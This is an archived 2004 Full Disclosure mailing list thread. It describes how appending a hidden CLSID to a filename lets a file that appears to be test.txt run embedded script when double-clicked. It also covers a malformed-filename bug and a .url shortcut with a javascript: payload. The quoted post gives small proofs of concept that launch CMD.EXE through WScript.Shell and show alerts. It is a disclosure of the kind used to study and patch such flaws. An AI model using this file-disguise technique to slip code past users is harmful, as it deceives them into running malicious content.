Home page logo
/

fulldisclosure logo Full Disclosure mailing list archives

RE: Microsoft hides certain types of files from your eyes + some filename parsing bug
From: Jelmer <jkuperus () planet nl>
Date: Thu, 08 Jul 2004 03:05:25 +0200

Ancient news

http://www.guninski.com/clsidext.html


--jelmer


-----Original Message-----
From: full-disclosure-admin () lists netsys com
[mailto:full-disclosure-admin () lists netsys com] On Behalf Of Good One
Sent: donderdag 8 juli 2004 1:37
To: full-disclosure () lists netsys com
Subject: [Full-disclosure] Microsoft hides certain types of files from your
eyes + some filename parsing bug

Microsoft HIDES certain types of files from your eyes:
 
This one is old unpatched "behaviour" ...
 
If you will create in windows explorer file :
 
test.txt 
with content :
 
<script>
a=new ActiveXObject("WSCript.Shell");
a.run("CMD.EXE");
alert("Hello, I'm Silly Billy !");
</script>
 
It will be executed if you will add CLSID to it's name and user double
clicks it :
 
test.txt.{3050F4D8-98B5-11CF-BB82-00AA00BDCE0B}
 
Note: 
CLSID will remain hidden (explorer will not show it up in any means)
File name for user will remain : test.txt
 
This adds numerous possibilities for viruses to fool end user into safe
content.
 
 
another filename parsing bug (system even cannot access it) :
By some technics windows still allows to write file on harddisk with funny
name like :
 
test [good one :] .avi
 
End user will expierence certain difficulties to remove it afterwards from
system.
 
It's name will change to "test [good one", it will have no extension, will
show up 0 bytes etc, etc...
 
 
Of course .url and .lnk are hidden as well, being "shortcuts" in m$ way. The
contents of those files are up to you ... :-) 
 
For example : file "test.url" with this content will open your browser with
alert.
 
[DEFAULT]
BASEURL=javascript:alert('hello mama !')
[InternetShortcut]
URL=javascript:alert('hello mama !')
Modified=00027F010505010100
 
 
m$ is good for gaming, not for serious work..
 
 
- SomeMan.
 

ALL-NEW Yahoo! Messenger - sooooo many all-new ways to express yourself 


_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html


  By Date           By Thread  

Current thread:
[ Nmap | Sec Tools | Mailing Lists | Site News | About/Contact | Advertising | Privacy ]